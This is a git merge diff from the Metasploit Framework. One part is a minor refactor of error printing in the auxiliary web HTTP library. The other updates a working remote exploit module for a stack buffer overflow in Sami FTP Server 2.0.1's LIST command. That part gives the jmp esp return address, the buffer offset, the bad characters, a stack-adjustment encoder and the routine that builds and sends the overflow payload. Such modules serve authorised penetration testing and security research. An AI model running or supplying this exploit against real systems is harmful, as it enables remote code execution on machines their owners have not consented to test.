Merge branch 'master' of https://github.com/rapid7/metasploit-framework

lib/msf/core/auxiliary/web/http.rb

@@ -252,11 +252,6 @@ class Auxiliary::Web::HTTP
 
 	private
 
-	def print_error( message )
-		return if !@parent
-		@parent.print_error message
-	end
-
 	def call_after_run_blocks
 		while block = @after_run_blocks.pop
 			block.call
@@ -318,10 +313,15 @@ class Auxiliary::Web::HTTP
 	# This is bad but we can't anticipate the gazilion different types of network
 	# i/o errors between Rex and Errno.
 	rescue => e
-		elog e.to_s
-		e.backtrace.each { |l| elog l }
+		print_error e.to_s
+		e.backtrace.each { |l| print_error l }
 		Response.empty
 	end
 
+	def print_error( message )
+		return if !@parent
+		@parent.print_error message
+	end
+
 end
 end

modules/exploits/windows/ftp/sami_ftpd_list.rb

@@ -8,18 +8,23 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = AverageRanking
+	Rank = LowRanking
 
 	include Msf::Exploit::Remote::Ftp
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'			 => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+			'Name'			 => 'Sami FTP Server LIST Command Buffer Overflow',
 			'Description'	 => %q{
-					A buffer overflow is triggered when a long LIST
-				command is sent to the server and the user views the Log tab.
+					This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
+				The vulnerability exists in the processing of LIST commands. In order to trigger
+				the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing
+				application, in the target machine. On the other hand, the source IP address used
+				to connect with the FTP Server is needed. If the user can't provide it, the module
+				will try to resolve it. This module has been tested successfully on Sami FTP Server
+				2.0.1 over Windows XP SP3.
 			},
-			'Platform'		 => 'Windows',
+			'Platform'		 => 'win',
 			'Author'		 =>
 				[
 					'superkojiman', # Original exploit
@@ -29,48 +34,46 @@ class Metasploit4 < Msf::Exploit::Remote
 			'References'	 =>
 				[
 					[ 'OSVDB', '90815'],
-					[ 'EDB', '24557'],
+					[ 'BID', '58247'],
+					[ 'EDB', '24557']
 				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'seh',
-					'target' => 0
-				},
 			'Privileged'	 => false,
 			'Payload'		 =>
 				{
-					'Space'    => 900,
-					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
-					'StackAdjustment' => -3500,
+					'Space'          => 1500,
+					'DisableNops'    => true,
+					'BadChars'       => "\x00\x0a\x0d\x20\x5c",
+					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 				},
 			'Targets'		 =>
 				[
-					[
-						'Windows XP English SP3',
+					[ 'Sami FTP Server 2.0.1 / Windows XP SP3',
 						{
-							'Platform' => 'win',
-							'Ret' => 0x10028283,
-							'Offset'   => 219,
-						},
+							'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
+							'Offset'   => 228
+						}
 					],
 				],
+			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Feb 27 2013'))
+		register_options(
+			[
+				OptAddress.new('SOURCEIP', [false, 'The local client address'])
+			], self.class)
 	end
 
 	def exploit
 		connect
-
-		print_status("Trying target #{target.name}...")
-
-		buf = rand_text_english(target['Offset'], payload_badchars)
+		if datastore['SOURCEIP']
+			ip_length = datastore['SOURCEIP'].length
+		else
+			ip_length = Rex::Socket.source_address(rhost).length
+		end
+		buf = rand_text(target['Offset'] - ip_length)
 		buf << [ target['Ret'] ].pack('V')
+		buf << rand_text(16)
 		buf << payload.encoded
-
-		send_cmd( ['USER', datastore['FTPUSER']] , false )
-		send_cmd( ['PASS', datastore['FTPPASS']], false )
 		send_cmd( ['LIST', buf], false )
-
-		handler
 		disconnect
 	end